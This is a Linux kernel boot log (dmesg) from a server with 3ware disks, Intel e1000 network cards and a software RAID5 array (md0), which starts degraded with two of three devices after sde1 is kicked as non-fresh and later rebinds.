[ 6.202243] GSI 16 (level, low) -> IRQ 19
[ 6.202255] PCI: Setting latency timer of device 0000:00:1d.0 to 64
[ 6.202263] uhci_hcd 0000:00:1d.0: UHCI Host Controller
[ 6.202476] scsi 2:0:1:0: Direct-Access 3ware Logical Disk 1 1.2 PQ: 0 ANSI: 0
[ 6.202514] uhci_hcd 0000:00:1d.0: new USB bus registered, assigned bus number 1
[ 6.202560] uhci_hcd 0000:00:1d.0: irq 19, io base 0x0000dc00
[ 6.202734] scsi 2:0:2:0: Direct-Access 3ware Logical Disk 2 1.2 PQ: 0 ANSI: 0
[ 6.202814] usb usb1: configuration #1 chosen from 1 choice
[ 6.202851] hub 1-0:1.0: USB hub found
[ 6.202862] hub 1-0:1.0: 2 ports detected
[ 6.202964] scsi 2:0:3:0: Direct-Access 3ware Logical Disk 3 1.2 PQ: 0 ANSI: 0
[ 6.203210] scsi 2:0:4:0: Direct-Access 3ware Logical Disk 4 1.2 PQ: 0 ANSI: 0
[ 6.215988] SCSI device sda: 488397168 512-byte hdwr sectors (250059 MB)
[ 6.216045] sda: Write Protect is off
[ 6.216050] sda: Mode Sense: 00 00 00 00
[ 6.216422] SCSI device sda: write cache: enabled, read cache: disabled, supports DPO and FUA
[ 6.216868] SCSI device sda: 488397168 512-byte hdwr sectors (250059 MB)
[ 6.216906] sda: Write Protect is off
[ 6.216911] sda: Mode Sense: 00 00 00 00
[ 6.217265] SCSI device sda: write cache: enabled, read cache: disabled, supports DPO and FUA
[ 6.217274] sda: sda1 sda2
[ 6.219036] sd 2:0:0:0: Attached scsi disk sda
[ 6.219474] SCSI device sdb: 488397168 512-byte hdwr sectors (250059 MB)
[ 6.219504] sdb: Write Protect is off
[ 6.219508] sdb: Mode Sense: 00 00 00 00
[ 6.219837] SCSI device sdb: write cache: enabled, read cache: disabled, supports DPO and FUA
[ 6.220202] SCSI device sdb: 488397168 512-byte hdwr sectors (250059 MB)
[ 6.220222] sdb: Write Protect is off
[ 6.220225] sdb: Mode Sense: 00 00 00 00
[ 6.220533] SCSI device sdb: write cache: enabled, read cache: disabled, supports DPO and FUA
[ 6.220537] sdb: sdb1
[ 6.227050] sd 2:0:1:0: Attached scsi disk sdb
[ 6.227468] SCSI device sdc: 488397168 512-byte hdwr sectors (250059 MB)
[ 6.227491] sdc: Write Protect is off
[ 6.227496] sdc: Mode Sense: 00 00 00 00
[ 6.227800] SCSI device sdc: write cache: enabled, read cache: disabled, supports DPO and FUA
[ 6.228141] SCSI device sdc: 488397168 512-byte hdwr sectors (250059 MB)
[ 6.228159] sdc: Write Protect is off
[ 6.228163] sdc: Mode Sense: 00 00 00 00
[ 6.228470] SCSI device sdc: write cache: enabled, read cache: disabled, supports DPO and FUA
[ 6.228474] sdc: sdc1
[ 6.232602] sd 2:0:2:0: Attached scsi disk sdc
[ 6.232999] SCSI device sdd: 488397168 512-byte hdwr sectors (250059 MB)
[ 6.233024] sdd: Write Protect is off
[ 6.233028] sdd: Mode Sense: 00 00 00 00
[ 6.233335] SCSI device sdd: write cache: enabled, read cache: disabled, supports DPO and FUA
[ 6.233672] SCSI device sdd: 488397168 512-byte hdwr sectors (250059 MB)
[ 6.233689] sdd: Write Protect is off
[ 6.233692] sdd: Mode Sense: 00 00 00 00
[ 6.233999] SCSI device sdd: write cache: enabled, read cache: disabled, supports DPO and FUA
[ 6.234003] sdd: sdd1
[ 6.240615] sd 2:0:3:0: Attached scsi disk sdd
[ 6.241019] SCSI device sde: 488397168 512-byte hdwr sectors (250059 MB)
[ 6.241041] sde: Write Protect is off
[ 6.241045] sde: Mode Sense: 00 00 00 00
[ 6.241352] SCSI device sde: write cache: enabled, read cache: disabled, supports DPO and FUA
[ 6.241712] SCSI device sde: 488397168 512-byte hdwr sectors (250059 MB)
[ 6.241728] sde: Write Protect is off
[ 6.241732] sde: Mode Sense: 00 00 00 00
[ 6.242034] SCSI device sde: write cache: enabled, read cache: disabled, supports DPO and FUA
[ 6.242038] sde: sde1
[ 6.250295] sd 2:0:4:0: Attached scsi disk sde
[ 6.501907] e1000: 0000:04:02.0: e1000_probe: (PCI-X:66MHz:64-bit) 00:0d:61:6f:b2:06
[ 6.502132] scsi 1:0:1:0: Attached scsi generic sg0 type 5
[ 6.502194] sd 2:0:0:0: Attached scsi generic sg1 type 0
[ 6.502244] sd 2:0:1:0: Attached scsi generic sg2 type 0
[ 6.502306] sd 2:0:2:0: Attached scsi generic sg3 type 0
[ 6.502368] sd 2:0:3:0: Attached scsi generic sg4 type 0
[ 6.502388] ACPI: PCI Interrupt 0000:00:1d.1[B] -> GSI 19 (level, low) -> IRQ 20
[ 6.502409] sd 2:0:4:0: Attached scsi generic sg5 type 0
[ 6.502420] PCI: Setting latency timer of device 0000:00:1d.1 to 64
[ 6.502430] uhci_hcd 0000:00:1d.1: UHCI Host Controller
[ 6.502497] uhci_hcd 0000:00:1d.1: new USB bus registered, assigned bus number 2
[ 6.502550] uhci_hcd 0000:00:1d.1: irq 20, io base 0x0000d800
[ 6.502737] usb usb2: configuration #1 chosen from 1 choice
[ 6.502790] hub 2-0:1.0: USB hub found
[ 6.502809] hub 2-0:1.0: 2 ports detected
[ 6.561303] e1000: eth0: e1000_probe: Intel(R) PRO/1000 Network Connection
[ 6.561372] ACPI: PCI Interrupt 0000:04:02.1[B] -> GSI 49 (level, low) -> IRQ 21
[ 6.687400] md: md0 stopped.
[ 6.790790] usb 1-1: new low speed USB device using uhci_hcd and address 2
[ 6.851537] e1000: 0000:04:02.1: e1000_probe: (PCI-X:66MHz:64-bit) 00:0d:61:6f:b2:07
[ 6.910595] e1000: eth1: e1000_probe: Intel(R) PRO/1000 Network Connection
[ 6.946102] sr0: scsi3-mmc drive: 52x/52x cd/rw xa/form2 cdda tray
[ 6.946117] Uniform CD-ROM driver Revision: 3.20
[ 6.946261] sr 1:0:1:0: Attached scsi CD-ROM sr0
[ 6.947752] Attempting manual resume
[ 6.947759] swsusp: Resume From Partition 8:1
[ 6.947761] PM: Checking swsusp image.
[ 6.947987] PM: Resume from disk failed.
[ 6.984973] kjournald starting. Commit interval 5 seconds
[ 6.985035] EXT3-fs: mounted filesystem with ordered data mode.
[ 7.055071] md: md0 stopped.
[ 7.068433] usb 1-1: configuration #1 chosen from 1 choice
[ 7.107857] md: invalid raid superblock magic on sda
[ 7.107925] md: sda has invalid sb, not importing!
[ 7.107931] md: md_import_device returned -22
[ 7.108130] md: invalid raid superblock magic on sda
[ 7.108194] md: sda has invalid sb, not importing!
[ 7.108201] md: md_import_device returned -22
[ 7.108376] md: invalid raid superblock magic on sda
[ 7.108432] md: sda has invalid sb, not importing!
[ 7.108437] md: md_import_device returned -22
[ 10.046754] e1000: eth0: e1000_watchdog: NIC Link is Up 100 Mbps Full Duplex
[ 11.562138] input: PC Speaker as /class/input/input1
[ 11.623123] pci_hotplug: PCI Hot Plug PCI Core version: 0.5
[ 11.656171] EDAC MC: Ver: 2.0.1 Jun 7 2007
[ 11.699767] shpchp: Standard Hot Plug PCI Controller Driver version: 0.4
[ 11.781507] parport: PnPBIOS parport detected.
[ 11.781601] parport0: PC-style at 0x378 (0x778), irq 7, dma 3 [PCSPP,TRISTATE,COMPAT,ECP,DMA]
[ 11.934009] EDAC e7xxx: tolm = f8000, remapbase = 200000, remaplimit = 204000
[ 11.934119] EDAC MC0: Giving out device to e7xxx_edac E7501: DEV 0000:00:00.0
[ 11.971793] intel_rng: FWH not detected
[ 12.009270] usbcore: registered new interface driver hiddev
[ 12.190587] input: USB Keyboard as /class/input/input2
[ 12.190669] input: USB HID v1.10 Keyboard [ USB Keyboard] on usb-0000:00:1d.0-1
[ 12.197187] iTCO_vendor_support: vendor-support=0
[ 12.239915] iTCO_wdt: Intel TCO WatchDog Timer Driver v1.01 (11-Nov-2006)
[ 12.278863] input: USB Keyboard as /class/input/input3
[ 12.278954] input: USB HID v1.10 Device [ USB Keyboard] on usb-0000:00:1d.0-1
[ 12.278988] usbcore: registered new interface driver usbhid
[ 12.278995] drivers/usb/input/hid-core.c: v2.6:USB HID core driver
[ 12.314631] usbcore: registered new interface driver xpad
[ 12.314645] drivers/usb/input/xpad.c: driver for Xbox controllers v0.1.6
[ 12.559829] input: ImPS/2 Generic Wheel Mouse as /class/input/input4
[ 12.562789] iTCO_wdt: Found a ICH3-S TCO device (Version=1, TCOBASE=0x0460)
[ 12.562838] iTCO_wdt: initialized. heartbeat=30 sec (nowayout=0)
[ 12.603501] md: md0 stopped.
[ 12.653747] md: bind
[ 12.653914] md: bind
[ 12.654064] md: bind
[ 12.654096] md: kicking non-fresh sde1 from array!
[ 12.654101] md: unbind
[ 12.654110] md: export_rdev(sde1)
[ 12.704512] raid5: device sdc1 operational as raid disk 1
[ 12.704516] raid5: device sdd1 operational as raid disk 2
[ 12.704968] raid5: allocated 3163kB for md0
[ 12.704972] raid5: raid level 5 set md0 active with 2 out of 3 devices, algorithm 2
[ 12.705030] RAID5 conf printout:
[ 12.705032] --- rd:3 wd:2
[ 12.705035] disk 1, o:1, dev:sdc1
[ 12.705037] disk 2, o:1, dev:sdd1
[ 13.424989] NET: Registered protocol family 17
[ 13.572430] lp0: using parport0 (interrupt-driven).
[ 13.796845] Adding 19631388k swap on /dev/disk/by-uuid/cf84dd15-e266-462b-a711-db16bd70b6d9. Priority:-1 extents:1 across:19631388k
[ 13.993098] EXT3 FS on sda2, internal journal
[ 16.513909] NET: Registered protocol family 10
[ 16.514110] lo: Disabled Privacy Extensions
[ 16.514837] ADDRCONF(NETDEV_UP): eth1: link is not ready
[ 27.362894] eth0: no IPv6 routers present
[ 415.361598] kjournald starting. Commit interval 5 seconds
[ 415.392572] EXT3 FS on dm-0, internal journal
[ 415.392580] EXT3-fs: mounted filesystem with ordered data mode.
[75070.083687] md: bind
[75070.106882] RAID5 conf printout:
[75070.106892] --- rd:3 wd:2
[75070.106902] disk 0, o:1, dev:sde1
[75070.106909] disk 1, o:1, dev:sdc1
[75070.106915] disk 2, o:1, dev:sdd1